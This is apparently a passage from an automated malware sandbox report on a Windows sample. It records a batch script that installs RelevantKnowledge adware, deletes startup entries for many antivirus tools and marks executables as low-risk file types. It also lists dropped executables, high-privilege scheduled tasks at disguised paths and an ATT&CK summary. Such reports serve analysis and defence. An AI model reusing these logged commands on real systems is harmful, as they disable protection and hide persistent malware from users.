"%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
-
C:\Users\Admin\AppData\Local\Temp\D01A.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\D01A.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D01A.exe (process tree depth 2)
Command line: C:\Users\Admin\AppData\Local\Temp\D01A.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D4FD.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\D4FD.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (process tree depth 2)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 732
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (process tree depth 2)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 776
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (process tree depth 2)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 848
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (process tree depth 2)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 880
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (process tree depth 2)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 776
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D78E.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\D78E.exe
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\DCEE.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\DCEE.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe (process tree depth 1)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (process tree depth 1)
Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (process tree depth 1)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (process tree depth 1)
Command line: C:\Windows\explorer.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe (process tree depth 1)
Command line: C:\Windows\SysWOW64\explorer.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe (process tree depth 1)
Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (process tree depth 1)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (process tree depth 1)
Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (process tree depth 1)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\system32\schtasks.exe (process tree depth 1)
Command line: schtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043303\fsucenter.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043241\fsucenter.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads